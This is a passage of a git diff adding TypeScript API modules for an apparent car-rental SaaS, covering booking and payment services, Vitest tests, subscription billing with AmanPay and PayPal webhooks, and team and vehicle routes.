license is expired', 400, 'license_expired') + } + + const reservation = await repo.createReservation({ + companyId: company.id, + vehicleId: vehicle.id, + customerId: customer.id, + offerId: body.offerId ?? null, + promoCodeUsed: body.promoCodeUsed ?? null, + vehicleCategory: vehicle.category, + source: body.source ?? 'PUBLIC_SITE', + startDate: start, + endDate: end, + dailyRate: vehicle.dailyRate, + totalDays, + totalAmount: baseAmount - discountAmount + pricingRulesTotal, + discountAmount, + pricingRulesApplied: applied, + pricingRulesTotal, + notes: body.notes ?? null, + status: 'DRAFT', + }) + + const insuranceIds = body.selectedInsurancePolicyIds ?? [] + if (insuranceIds.length > 0) { + await applyInsurancesToReservation(reservation.id, company.id, insuranceIds, totalDays, baseAmount) + } + if (additionalDriversList.length > 0) { + await applyAdditionalDriversToReservation(reservation.id, company.id, additionalDriversList, totalDays) + } + if (body.licenseExpiry) { + await validateAndFlagLicense(customer.id).catch(() => null) + } + + const refreshed = await repo.findReservationWithDetails(reservation.id) + return { + ...refreshed, + requiresManualApproval: + primaryLicenseResult.requiresApproval || + refreshed.additionalDrivers.some((d) => d.requiresApproval), + } +} + +export async function getBooking(slug: string, reservationId: string) { + const company = await repo.findCompanyBySlug(slug) + return repo.findBooking(reservationId, company.id) +} + +export async function initPayment(slug: string, reservationId: string, body: { + provider: 'AMANPAY' | 'PAYPAL'; currency?: 'MAD' | 'USD' | 'EUR'; successUrl: string; failureUrl: string +}) { + const company = await repo.findCompanyBySlug(slug) + const reservation = await repo.findReservationForPayment(reservationId, company.id) + + if (reservation.paymentStatus === 'PAID') { + throw new AppError('This reservation is already paid', 409, 'already_paid') + } + + const customerLicenseResult = validateLicense(reservation.customer.licenseExpiry) + const licenseBlocked = + reservation.customer.licenseValidationStatus === 'DENIED' || + customerLicenseResult.status === 'EXPIRED' || + (customerLicenseResult.requiresApproval && reservation.customer.licenseValidationStatus !== 'APPROVED') || + reservation.additionalDrivers.some((d) => d.licenseExpired || (d.requiresApproval && !d.approvedAt)) + + if (licenseBlocked) { + throw new AppError('This reservation requires license review before payment can be processed', 409, 'license_review_required') + } + + const currency = body.currency ?? 'MAD' + const amount = reservation.totalAmount + const description = `Rental: ${reservation.vehicle.make} ${reservation.vehicle.model}` + const orderId = `res-${reservation.id}-${Date.now()}` + const webhookBase = process.env.API_URL ?? 'http://localhost:4000' + + let checkoutUrl: string + let amanpayTransactionId: string | null = null + let paypalCaptureId: string | null = null + + if (body.provider === 'AMANPAY') { + if (!amanpay.isConfigured()) { + throw new AppError('Online payment is not available for this company', 503, 'provider_not_configured') + } + const brand = company.brand as any + const merchantId = brand?.amanpayMerchantId ?? process.env.AMANPAY_MERCHANT_ID ?? '' + const secretKey = brand?.amanpaySecretKey ?? process.env.AMANPAY_SECRET_KEY ?? '' + if (!merchantId || !secretKey) { + throw new AppError('AmanPay is not configured for this company', 503, 'provider_not_configured') + } + const result = await amanpay.createCheckout({ + amount, currency, orderId, description, + customerEmail: reservation.customer.email, + customerName: `${reservation.customer.firstName} ${reservation.customer.lastName}`, + successUrl: body.successUrl, + failureUrl: body.failureUrl, + webhookUrl: `${webhookBase}/api/v1/payments/webhooks/amanpay`, + }) + checkoutUrl = result.checkoutUrl + amanpayTransactionId = result.transactionId + } else { + if (!paypal.isConfigured()) { + throw new AppError('PayPal is not available for this company', 503, 'provider_not_configured') + } + const result = await paypal.createOrder({ + amount, currency, orderId, description, + returnUrl: body.successUrl, + cancelUrl: body.failureUrl, + }) + checkoutUrl = result.approveUrl + paypalCaptureId = result.orderId + } + + await repo.createRentalPayment({ + companyId: company.id, + reservationId: reservation.id, + amount, + currency, + paymentProvider: body.provider, + amanpayTransactionId, + paypalCaptureId, + }) + + return { checkoutUrl } +} + +export async function capturePaypal(slug: string, paypalOrderId: string) { + const company = await repo.findCompanyBySlug(slug) + const payment = await repo.findPaymentByPaypalOrderId(paypalOrderId, company.id) + const capture = await paypal.captureOrder(paypalOrderId) as Record + const captureId = capture.purchase_units?.[0]?.payments?.captures?.[0]?.id ?? paypalOrderId + await repo.capturePaypalPayment(payment.id, captureId, payment.reservationId, payment.amount) + return { success: true } +} + +export async function handleContact(slug: string, body: { name: string; email: string; message: string }) { + const company = await repo.findCompanyBySlug(slug) + return { + success: true, + deliveredTo: company.brand?.publicEmail ?? company.email, + preview: body, + } +} diff --git a/apps/api/src/modules/site/site.test.ts b/apps/api/src/modules/site/site.test.ts new file mode 100644 index 0000000..4dc6258 --- /dev/null +++ b/apps/api/src/modules/site/site.test.ts @@ -0,0 +1,257 @@ +import { describe, it, expect, vi, beforeEach } from 'vitest' +import { AppError, NotFoundError } from '../../http/errors' + +vi.mock('./site.repo', () => ({ + findCompanyBySlug: vi.fn(), + findPublishedVehicles: vi.fn(), + findVehicleById: vi.fn(), + findActiveOffers: vi.fn(), + findInsurancePolicies: vi.fn(), + findOfferByPromoCode: vi.fn(), + upsertCustomer: vi.fn(), + createReservation: vi.fn(), + findReservationWithDetails: vi.fn(), + findBooking: vi.fn(), + findReservationForPayment: vi.fn(), + createRentalPayment: vi.fn(), + findPaymentByPaypalOrderId: vi.fn(), + capturePaypalPayment: vi.fn(), +})) + +vi.mock('../../services/vehicleAvailabilityService', () => ({ + getVehicleAvailabilitySummary: vi.fn(), +})) + +vi.mock('../../services/insuranceService', () => ({ + applyInsurancesToReservation: vi.fn().mockResolvedValue(undefined), +})) + +vi.mock('../../services/additionalDriverService', () => ({ + applyAdditionalDriversToReservation: vi.fn().mockResolvedValue(undefined), +})) + +vi.mock('../../services/pricingRuleService', () => ({ + applyPricingRules: vi.fn(), +})) + +vi.mock('../../services/licenseValidationService', () => ({ + validateLicense: vi.fn(), + validateAndFlagLicense: vi.fn().mockResolvedValue(undefined), +})) + +vi.mock('../../services/amanpayService', () => ({ + isConfigured: vi.fn(), + createCheckout: vi.fn(), +})) + +vi.mock('../../services/paypalService', () => ({ + isConfigured: vi.fn(), + createOrder: vi.fn(), + captureOrder: vi.fn(), +})) + +vi.mock('../../services/platformContentService', () => ({ + getMarketplaceHomepageContent: vi.fn(), +})) + +import * as repo from './site.repo' +import { getVehicleAvailabilitySummary } from '../../services/vehicleAvailabilityService' +import { applyPricingRules } from '../../services/pricingRuleService' +import { validateLicense } from '../../services/licenseValidationService' +import * as amanpay from '../../services/amanpayService' +import * as paypalSvc from '../../services/paypalService' +import { + getBrand, getPublicVehicles, checkAvailability, validatePromoCode, + createBooking, initPayment, +} from './site.service' + +const SLUG = 'test-company' + +function makeCompany(overrides: object = {}) { + return { + id: 'co-1', slug: SLUG, name: 'Test Co', phone: null, email: 'co@test.com', + brand: { publicEmail: null }, contractSettings: null, + ...overrides, + } +} + +function makeVehicle(overrides: object = {}) { + return { + id: 'v-1', dailyRate: 10000, year: 2022, make: 'Toyota', model: 'Camry', + isPublished: true, status: 'AVAILABLE', companyId: 'co-1', category: 'SEDAN', + ...overrides, + } +} + +beforeEach(() => { vi.clearAllMocks() }) + +// ──────────────────────────────────────────────────────────────────────────── +describe('getBrand', () => { + it('returns company and public brand data only', async () => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany({ + brand: { + displayName: 'Test Co', + paymentMethodsEnabled: ['AMANPAY', 'PAYPAL'], + amanpayMerchantId: 'merchant-id', + amanpaySecretKey: 'top-secret', + paypalMerchantId: 'paypal-merchant-id', + }, + }) as any) + const result = await getBrand(SLUG) + + expect(result.company.id).toBe('co-1') + expect(result.brand).toMatchObject({ + displayName: 'Test Co', + paymentMethodsEnabled: ['AMANPAY', 'PAYPAL'], + paypalMerchantId: 'paypal-merchant-id', + }) + expect(result.brand).not.toHaveProperty('amanpayMerchantId') + expect(result.brand).not.toHaveProperty('amanpaySecretKey') + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('getPublicVehicles', () => { + it('returns vehicles enriched with availability', async () => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany() as any) + vi.mocked(repo.findPublishedVehicles).mockResolvedValue([makeVehicle()] as any) + vi.mocked(getVehicleAvailabilitySummary).mockResolvedValue({ available: true, status: 'AVAILABLE', nextAvailableAt: null, blockingReason: null }) + + const result = await getPublicVehicles(SLUG) + expect(result[0].availability).toBe(true) + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('checkAvailability', () => { + it('returns availability result for given date range', async () => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany() as any) + vi.mocked(getVehicleAvailabilitySummary).mockResolvedValue({ available: true, status: 'AVAILABLE', nextAvailableAt: null, blockingReason: null }) + + const result = await checkAvailability(SLUG, 'v-1', '2025-06-01T00:00:00.000Z', '2025-06-04T00:00:00.000Z') + expect(result.available).toBe(true) + expect(getVehicleAvailabilitySummary).toHaveBeenCalledWith('v-1', { range: { startDate: new Date('2025-06-01T00:00:00.000Z'), endDate: new Date('2025-06-04T00:00:00.000Z') } }) + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('validatePromoCode', () => { + it('returns offer when code is valid', async () => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany() as any) + vi.mocked(repo.findOfferByPromoCode).mockResolvedValue({ id: 'o-1' } as any) + const result = await validatePromoCode(SLUG, 'SUMMER10') + expect((result as any).id).toBe('o-1') + }) + + it('throws NotFoundError for unknown promo code', async () => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany() as any) + vi.mocked(repo.findOfferByPromoCode).mockResolvedValue(null) + await expect(validatePromoCode(SLUG, 'BADCODE')).rejects.toBeInstanceOf(NotFoundError) + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('createBooking', () => { + const baseBody = { + vehicleId: 'v-1', + startDate: '2025-06-01T00:00:00.000Z', + endDate: '2025-06-04T00:00:00.000Z', + firstName: 'Ali', lastName: 'Ben', email: 'ali@test.com', + } + + beforeEach(() => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany() as any) + vi.mocked(repo.findVehicleById).mockResolvedValue(makeVehicle() as any) + vi.mocked(getVehicleAvailabilitySummary).mockResolvedValue({ available: true, status: 'AVAILABLE', nextAvailableAt: null, blockingReason: null }) + vi.mocked(repo.upsertCustomer).mockResolvedValue({ id: 'c-1' } as any) + vi.mocked(applyPricingRules).mockResolvedValue({ applied: [], total: 0 }) + vi.mocked(validateLicense).mockReturnValue({ status: 'VALID', requiresApproval: false } as any) + vi.mocked(repo.createReservation).mockResolvedValue({ id: 'r-1' } as any) + vi.mocked(repo.findReservationWithDetails).mockResolvedValue({ id: 'r-1', additionalDrivers: [], insurances: [] } as any) + }) + + it('creates a booking and returns reservation with requiresManualApproval flag', async () => { + const result = await createBooking(SLUG, baseBody) + expect(repo.createReservation).toHaveBeenCalledOnce() + expect((result as any).requiresManualApproval).toBe(false) + }) + + it('throws AppError for invalid dates', async () => { + await expect( + createBooking(SLUG, { ...baseBody, startDate: '2025-06-04T00:00:00.000Z', endDate: '2025-06-01T00:00:00.000Z' }), + ).rejects.toMatchObject({ error: 'invalid_dates' }) + }) + + it('throws AppError when vehicle unavailable', async () => { + vi.mocked(getVehicleAvailabilitySummary).mockResolvedValue({ available: false, status: 'RESERVED', nextAvailableAt: null, blockingReason: 'RESERVATION' }) + await expect(createBooking(SLUG, baseBody)).rejects.toMatchObject({ error: 'unavailable' }) + }) + + it('throws AppError when primary driver license is expired', async () => { + vi.mocked(validateLicense).mockReturnValue({ status: 'EXPIRED', requiresApproval: false } as any) + await expect(createBooking(SLUG, { ...baseBody, licenseExpiry: '2020-01-01T00:00:00.000Z' })).rejects.toMatchObject({ error: 'license_expired' }) + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('initPayment — payment guard paths', () => { + const payBody = { provider: 'PAYPAL' as const, successUrl: 'http://ok', failureUrl: 'http://fail' } + + it('throws AppError when reservation is already paid', async () => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany() as any) + vi.mocked(repo.findReservationForPayment).mockResolvedValue({ + paymentStatus: 'PAID', totalAmount: 100, + customer: { licenseExpiry: null, licenseValidationStatus: 'APPROVED', email: 'a@b.com', firstName: 'A', lastName: 'B' }, + additionalDrivers: [], + vehicle: { make: 'Toyota', model: 'Camry' }, + } as any) + vi.mocked(validateLicense).mockReturnValue({ status: 'VALID', requiresApproval: false } as any) + + await expect(initPayment(SLUG, 'r-1', payBody)).rejects.toMatchObject({ error: 'already_paid' }) + }) + + it('throws AppError when license review is required', async () => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany() as any) + vi.mocked(repo.findReservationForPayment).mockResolvedValue({ + paymentStatus: 'UNPAID', totalAmount: 100, + customer: { licenseExpiry: null, licenseValidationStatus: 'DENIED', email: 'a@b.com', firstName: 'A', lastName: 'B' }, + additionalDrivers: [], + vehicle: { make: 'Toyota', model: 'Camry' }, + } as any) + vi.mocked(validateLicense).mockReturnValue({ status: 'VALID', requiresApproval: false } as any) + + await expect(initPayment(SLUG, 'r-1', payBody)).rejects.toMatchObject({ error: 'license_review_required' }) + }) + + it('throws AppError when PayPal is not configured', async () => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany() as any) + vi.mocked(repo.findReservationForPayment).mockResolvedValue({ + paymentStatus: 'UNPAID', totalAmount: 30000, + customer: { licenseExpiry: null, licenseValidationStatus: 'APPROVED', email: 'a@b.com', firstName: 'Ali', lastName: 'Ben' }, + additionalDrivers: [], + vehicle: { make: 'Toyota', model: 'Camry' }, + } as any) + vi.mocked(validateLicense).mockReturnValue({ status: 'VALID', requiresApproval: false } as any) + vi.mocked(paypalSvc.isConfigured).mockReturnValue(false) + + await expect(initPayment(SLUG, 'r-1', payBody)).rejects.toMatchObject({ error: 'provider_not_configured' }) + }) + + it('returns checkoutUrl when PayPal is configured', async () => { + vi.mocked(repo.findCompanyBySlug).mockResolvedValue(makeCompany() as any) + vi.mocked(repo.findReservationForPayment).mockResolvedValue({ + id: 'r-1', paymentStatus: 'UNPAID', totalAmount: 30000, companyId: 'co-1', + customer: { licenseExpiry: null, licenseValidationStatus: 'APPROVED', email: 'a@b.com', firstName: 'Ali', lastName: 'Ben' }, + additionalDrivers: [], + vehicle: { make: 'Toyota', model: 'Camry' }, + } as any) + vi.mocked(validateLicense).mockReturnValue({ status: 'VALID', requiresApproval: false } as any) + vi.mocked(paypalSvc.isConfigured).mockReturnValue(true) + vi.mocked(paypalSvc.createOrder).mockResolvedValue({ approveUrl: 'https://paypal.com/approve', orderId: 'pp-1' } as any) + vi.mocked(repo.createRentalPayment).mockResolvedValue(undefined as any) + + const result = await initPayment(SLUG, 'r-1', payBody) + expect(result.checkoutUrl).toBe('https://paypal.com/approve') + expect(repo.createRentalPayment).toHaveBeenCalledOnce() + }) +}) diff --git a/apps/api/src/modules/subscriptions/subscription.repo.ts b/apps/api/src/modules/subscriptions/subscription.repo.ts new file mode 100644 index 0000000..c4c887c --- /dev/null +++ b/apps/api/src/modules/subscriptions/subscription.repo.ts @@ -0,0 +1,60 @@ +import { prisma } from '../../lib/prisma' + +export function findByCompany(companyId: string) { + return prisma.subscription.findUnique({ + where: { companyId }, + include: { invoices: { orderBy: { createdAt: 'desc' }, take: 12 } }, + }) +} + +export function findInvoices(companyId: string) { + return prisma.subscriptionInvoice.findMany({ where: { companyId }, orderBy: { createdAt: 'desc' }, take: 50 }) +} + +export function findInvoiceByAmanpay(transactionId: string) { + return prisma.subscriptionInvoice.findFirst({ where: { amanpayTransactionId: transactionId }, include: { subscription: true } }) +} + +export function findInvoiceByPaypal(captureId: string) { + return prisma.subscriptionInvoice.findFirst({ where: { paypalCaptureId: captureId }, include: { subscription: true } }) +} + +export function findInvoiceByPaypalForCompany(paypalOrderId: string, companyId: string) { + return prisma.subscriptionInvoice.findFirstOrThrow({ where: { paypalCaptureId: paypalOrderId, companyId }, include: { subscription: true } }) +} + +export function markInvoicePaid(id: string) { + return prisma.subscriptionInvoice.update({ where: { id }, data: { status: 'PAID', paidAt: new Date() } }) +} + +export function activateSubscription(id: string, periodEnd: Date) { + return prisma.subscription.update({ + where: { id }, + data: { status: 'ACTIVE', currentPeriodStart: new Date(), currentPeriodEnd: periodEnd }, + }) +} + +export async function findOrCreateSubscription(companyId: string, plan: string, billingPeriod: string, currency: string) { + const existing = await prisma.subscription.findUnique({ where: { companyId } }) + if (existing) return existing + return prisma.subscription.create({ data: { companyId, plan: plan as any, billingPeriod: billingPeriod as any, currency, status: 'PENDING' as any } }) +} + +export function createInvoice(data: { + companyId: string; subscriptionId: string; amount: number; currency: string + paymentProvider: string; amanpayTransactionId?: string | null; paypalCaptureId?: string | null +}) { + return prisma.subscriptionInvoice.create({ data: { ...data, status: 'PENDING', paymentProvider: data.paymentProvider as any } }) +} + +export function updateInvoicePaypal(id: string, captureId: string) { + return prisma.subscriptionInvoice.update({ where: { id }, data: { status: 'PAID', paidAt: new Date(), paypalCaptureId: captureId } }) +} + +export function updatePlan(companyId: string, data: { plan: any; billingPeriod: any; currency: string }) { + return prisma.subscription.update({ where: { companyId }, data }) +} + +export function setCancelAtPeriodEnd(companyId: string, value: boolean) { + return prisma.subscription.update({ where: { companyId }, data: { cancelAtPeriodEnd: value } }) +} diff --git a/apps/api/src/modules/subscriptions/subscription.routes.ts b/apps/api/src/modules/subscriptions/subscription.routes.ts new file mode 100644 index 0000000..8aba292 --- /dev/null +++ b/apps/api/src/modules/subscriptions/subscription.routes.ts @@ -0,0 +1,99 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireRole } from '../../middleware/requireRole' +import { parseBody } from '../../http/validate' +import { ok } from '../../http/respond' +import * as amanpay from '../../services/amanpayService' +import * as paypal from '../../services/paypalService' +import * as service from './subscription.service' +import { checkoutSchema, changePlanSchema, capturePaypalSchema } from './subscription.schemas' + +const router = Router() + +// ─── Public ──────────────────────────────────────────────────── + +router.get('/plans', (_req, res) => { + ok(res, { data: service.getPlans() }) +}) + +router.get('/providers', (_req, res) => { + ok(res, { data: service.getProviders() }) +}) + +// ─── Webhooks (no auth) ──────────────────────────────────────── + +router.post('/webhooks/amanpay', async (req, res, next) => { + try { + const rawBody = JSON.stringify(req.body) + const signature = (req.headers['x-amanpay-signature'] as string) ?? '' + if (amanpay.isConfigured() && !amanpay.verifyWebhookSignature(rawBody, signature)) { + return res.status(401).json({ error: 'invalid_signature' }) + } + await service.handleAmanpayWebhook(req.body) + res.json({ received: true }) + } catch (err) { next(err) } +}) + +router.post('/webhooks/paypal', async (req, res, next) => { + try { + const rawBody = JSON.stringify(req.body) + const isValid = await paypal.verifyWebhookEvent(req.headers as Record, rawBody) + if (paypal.isConfigured() && !isValid) return res.status(401).json({ error: 'invalid_signature' }) + await service.handlePaypalWebhook(req.body) + res.json({ received: true }) + } catch (err) { next(err) } +}) + +// ─── PayPal capture (auth but no subscription check) ────────── + +router.post('/capture-paypal', requireCompanyAuth, requireTenant, async (req, res, next) => { + try { + const { paypalOrderId } = parseBody(capturePaypalSchema, req) + ok(res, { data: await service.capturePaypal(req.companyId, paypalOrderId) }) + } catch (err) { next(err) } +}) + +// ─── Authenticated ──────────────────────────────────────────── + +router.use(requireCompanyAuth, requireTenant) + +router.get('/me', async (req, res, next) => { + try { + ok(res, { data: await service.getSubscription(req.companyId) }) + } catch (err) { next(err) } +}) + +router.get('/invoices', async (req, res, next) => { + try { + ok(res, { data: await service.getInvoices(req.companyId) }) + } catch (err) { next(err) } +}) + +router.post('/checkout', requireRole('OWNER'), async (req, res, next) => { + try { + const body = parseBody(checkoutSchema, req) + ok(res, { data: await service.checkout(req.companyId, body) }) + } catch (err) { next(err) } +}) + +router.post('/change-plan', requireRole('OWNER'), async (req, res, next) => { + try { + const body = parseBody(changePlanSchema, req) + ok(res, { data: await service.changePlan(req.companyId, body) }) + } catch (err) { next(err) } +}) + +router.post('/cancel', requireRole('OWNER'), async (req, res, next) => { + try { + ok(res, { data: await service.cancel(req.companyId) }) + } catch (err) { next(err) } +}) + +router.post('/resume', requireRole('OWNER'), async (req, res, next) => { + try { + ok(res, { data: await service.resume(req.companyId) }) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/subscriptions/subscription.schemas.ts b/apps/api/src/modules/subscriptions/subscription.schemas.ts new file mode 100644 index 0000000..2af75bb --- /dev/null +++ b/apps/api/src/modules/subscriptions/subscription.schemas.ts @@ -0,0 +1,20 @@ +import { z } from 'zod' + +export const checkoutSchema = z.object({ + plan: z.enum(['STARTER', 'GROWTH', 'PRO']), + billingPeriod: z.enum(['MONTHLY', 'ANNUAL']), + currency: z.enum(['MAD', 'USD', 'EUR']), + provider: z.enum(['AMANPAY', 'PAYPAL']), + successUrl: z.string().url(), + failureUrl: z.string().url(), +}) + +export const changePlanSchema = z.object({ + plan: z.enum(['STARTER', 'GROWTH', 'PRO']), + billingPeriod: z.enum(['MONTHLY', 'ANNUAL']), + currency: z.enum(['MAD', 'USD', 'EUR']), +}) + +export const capturePaypalSchema = z.object({ + paypalOrderId: z.string(), +}) diff --git a/apps/api/src/modules/subscriptions/subscription.service.ts b/apps/api/src/modules/subscriptions/subscription.service.ts new file mode 100644 index 0000000..cdd853c --- /dev/null +++ b/apps/api/src/modules/subscriptions/subscription.service.ts @@ -0,0 +1,114 @@ +import { PLAN_PRICES } from '@rentaldrivego/types' +import { prisma } from '../../lib/prisma' +import { ValidationError } from '../../http/errors' +import * as amanpay from '../../services/amanpayService' +import * as paypal from '../../services/paypalService' +import * as repo from './subscription.repo' + +export function addPeriod(date: Date, period: string): Date { + const d = new Date(date) + period === 'ANNUAL' ? d.setFullYear(d.getFullYear() + 1) : d.setMonth(d.getMonth() + 1) + return d +} + +export function getPlans() { + return PLAN_PRICES +} + +export function getProviders() { + return { amanpay: amanpay.isConfigured(), paypal: paypal.isConfigured() } +} + +export function getSubscription(companyId: string) { + return repo.findByCompany(companyId) +} + +export function getInvoices(companyId: string) { + return repo.findInvoices(companyId) +} + +export async function handleAmanpayWebhook(event: any) { + const transactionId = event.transaction_id ?? event.id + const status = event.status?.toUpperCase() + if (status === 'PAID' || status === 'SUCCEEDED') { + const invoice = await repo.findInvoiceByAmanpay(transactionId) + if (invoice) { + await repo.markInvoicePaid(invoice.id) + await repo.activateSubscription(invoice.subscriptionId, addPeriod(new Date(), invoice.subscription.billingPeriod)) + } + } +} + +export async function handlePaypalWebhook(event: any) { + if (event.event_type === 'PAYMENT.CAPTURE.COMPLETED') { + const captureId = event.resource?.id as string + const invoice = await repo.findInvoiceByPaypal(captureId) + if (invoice) { + await repo.markInvoicePaid(invoice.id) + await repo.activateSubscription(invoice.subscriptionId, addPeriod(new Date(), invoice.subscription.billingPeriod)) + } + } +} + +export async function checkout(companyId: string, body: { + plan: 'STARTER' | 'GROWTH' | 'PRO'; billingPeriod: 'MONTHLY' | 'ANNUAL' + currency: 'MAD' | 'USD' | 'EUR'; provider: 'AMANPAY' | 'PAYPAL' + successUrl: string; failureUrl: string +}) { + const prices = PLAN_PRICES[body.plan]?.[body.billingPeriod] + if (!prices) throw new ValidationError('Invalid plan or billing period') + const amount = (prices as any)[body.currency] + if (!amount) throw new ValidationError('Currency not supported for this plan') + + const company = await prisma.company.findUniqueOrThrow({ where: { id: companyId } }) + const subscription = await repo.findOrCreateSubscription(companyId, body.plan, body.billingPeriod, body.currency) + + const orderId = `sub-${companyId}-${Date.now()}` + const description = `${body.plan} plan — ${body.billingPeriod}` + const webhookBase = process.env.API_URL ?? 'http://localhost:4000' + + let checkoutUrl: string + let amanpayTransactionId: string | null = null + let paypalCaptureId: string | null = null + + if (body.provider === 'AMANPAY') { + if (!amanpay.isConfigured()) throw new ValidationError('AmanPay is not configured on this platform') + const result = await amanpay.createCheckout({ + amount, currency: body.currency, orderId, description, + customerEmail: company.email, customerName: company.name, + successUrl: body.successUrl, failureUrl: body.failureUrl, + webhookUrl: `${webhookBase}/api/v1/subscriptions/webhooks/amanpay`, + }) + checkoutUrl = result.checkoutUrl + amanpayTransactionId = result.transactionId + } else { + if (!paypal.isConfigured()) throw new ValidationError('PayPal is not configured on this platform') + const result = await paypal.createOrder({ amount, currency: body.currency, orderId, description, returnUrl: body.successUrl, cancelUrl: body.failureUrl }) + checkoutUrl = result.approveUrl + paypalCaptureId = result.orderId + } + + const invoice = await repo.createInvoice({ companyId, subscriptionId: subscription.id, amount, currency: body.currency, paymentProvider: body.provider, amanpayTransactionId, paypalCaptureId }) + return { invoice, checkoutUrl } +} + +export async function capturePaypal(companyId: string, paypalOrderId: string) { + const invoice = await repo.findInvoiceByPaypalForCompany(paypalOrderId, companyId) + const capture = await paypal.captureOrder(paypalOrderId) as Record + const captureId = capture.purchase_units?.[0]?.payments?.captures?.[0]?.id ?? paypalOrderId + await repo.updateInvoicePaypal(invoice.id, captureId) + await repo.activateSubscription(invoice.subscriptionId, addPeriod(new Date(), invoice.subscription.billingPeriod)) + return { success: true } +} + +export function changePlan(companyId: string, data: { plan: any; billingPeriod: any; currency: string }) { + return repo.updatePlan(companyId, data) +} + +export function cancel(companyId: string) { + return repo.setCancelAtPeriodEnd(companyId, true) +} + +export function resume(companyId: string) { + return repo.setCancelAtPeriodEnd(companyId, false) +} diff --git a/apps/api/src/modules/team/team.routes.ts b/apps/api/src/modules/team/team.routes.ts new file mode 100644 index 0000000..1751341 --- /dev/null +++ b/apps/api/src/modules/team/team.routes.ts @@ -0,0 +1,63 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireSubscription } from '../../middleware/requireSubscription' +import { requireRole } from '../../middleware/requireRole' +import { parseBody, parseParams } from '../../http/validate' +import { ok, created } from '../../http/respond' +import * as service from './team.service' +import { inviteSchema, roleSchema, idParamSchema } from './team.schemas' + +const router = Router() + +router.use(requireCompanyAuth, requireTenant, requireSubscription) + +router.get('/', async (req, res, next) => { + try { + ok(res, { data: await service.getMembers(req.companyId) }) + } catch (err) { next(err) } +}) + +router.get('/stats', async (req, res, next) => { + try { + ok(res, await service.getMemberStats(req.companyId)) + } catch (err) { next(err) } +}) + +router.post('/invite', requireRole('OWNER'), async (req, res, next) => { + try { + const body = parseBody(inviteSchema, req) + created(res, { data: await service.inviteEmployee(req.companyId, req.employee.id, body) }) + } catch (err) { next(err) } +}) + +router.patch('/:id/role', requireRole('OWNER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { role } = parseBody(roleSchema, req) + ok(res, { data: await service.updateEmployeeRole(req.companyId, req.employee.id, req.employee.role, id, { role }) }) + } catch (err) { next(err) } +}) + +router.post('/:id/deactivate', requireRole('OWNER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + ok(res, { data: await service.deactivateEmployee(req.companyId, req.employee.role, id) }) + } catch (err) { next(err) } +}) + +router.post('/:id/reactivate', requireRole('OWNER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + ok(res, { data: await service.reactivateEmployee(req.companyId, req.employee.role, id) }) + } catch (err) { next(err) } +}) + +router.delete('/:id', requireRole('OWNER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + ok(res, { data: await service.removeEmployee(req.companyId, req.employee.role, id) }) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/team/team.schemas.ts b/apps/api/src/modules/team/team.schemas.ts new file mode 100644 index 0000000..c6563c9 --- /dev/null +++ b/apps/api/src/modules/team/team.schemas.ts @@ -0,0 +1,16 @@ +import { z } from 'zod' + +export const inviteSchema = z.object({ + firstName: z.string().min(1).max(64), + lastName: z.string().min(1).max(64), + email: z.string().email(), + role: z.enum(['MANAGER', 'AGENT']), +}) + +export const roleSchema = z.object({ + role: z.enum(['MANAGER', 'AGENT']), +}) + +export const idParamSchema = z.object({ + id: z.string().min(1), +}) diff --git a/apps/api/src/modules/team/team.service.ts b/apps/api/src/modules/team/team.service.ts new file mode 100644 index 0000000..599e0de --- /dev/null +++ b/apps/api/src/modules/team/team.service.ts @@ -0,0 +1,24 @@ +import { + listEmployees, + inviteEmployee, + updateEmployeeRole, + deactivateEmployee, + reactivateEmployee, + removeEmployee, +} from '../../services/teamService' + +export async function getMembers(companyId: string) { + return listEmployees(companyId) +} + +export async function getMemberStats(companyId: string) { + const members = await listEmployees(companyId) + return { + total: members.length, + active: members.filter((m) => m.isActive && m.invitationStatus === 'accepted').length, + pending: members.filter((m) => m.invitationStatus === 'pending').length, + inactive: members.filter((m) => !m.isActive && m.invitationStatus === 'accepted').length, + } +} + +export { inviteEmployee, updateEmployeeRole, deactivateEmployee, reactivateEmployee, removeEmployee } diff --git a/apps/api/src/modules/vehicles/vehicle.presenter.ts b/apps/api/src/modules/vehicles/vehicle.presenter.ts new file mode 100644 index 0000000..afcddc8 --- /dev/null +++ b/apps/api/src/modules/vehicles/vehicle.presenter.ts @@ -0,0 +1,7 @@ +export function presentVehicle(vehicle: any) { + return vehicle +} + +export function presentVehicleList(vehicles: any[], meta: { total: number; page: number; pageSize: number; totalPages: number }) { + return { data: vehicles, ...meta } +} diff --git a/apps/api/src/modules/vehicles/vehicle.repo.ts b/apps/api/src/modules/vehicles/vehicle.repo.ts new file mode 100644 index 0000000..6e76f3c --- /dev/null +++ b/apps/api/src/modules/vehicles/vehicle.repo.ts @@ -0,0 +1,91 @@ +import { prisma } from '../../lib/prisma' + +export async function findMany(where: any, skip: number, take: number) { + return Promise.all([ + prisma.vehicle.findMany({ where, skip, take, orderBy: { createdAt: 'desc' } }), + prisma.vehicle.count({ where }), + ]) +} + +export async function findById(id: string, companyId: string) { + return prisma.vehicle.findFirst({ where: { id, companyId } }) +} + +export async function findFirst(id: string, companyId: string) { + return 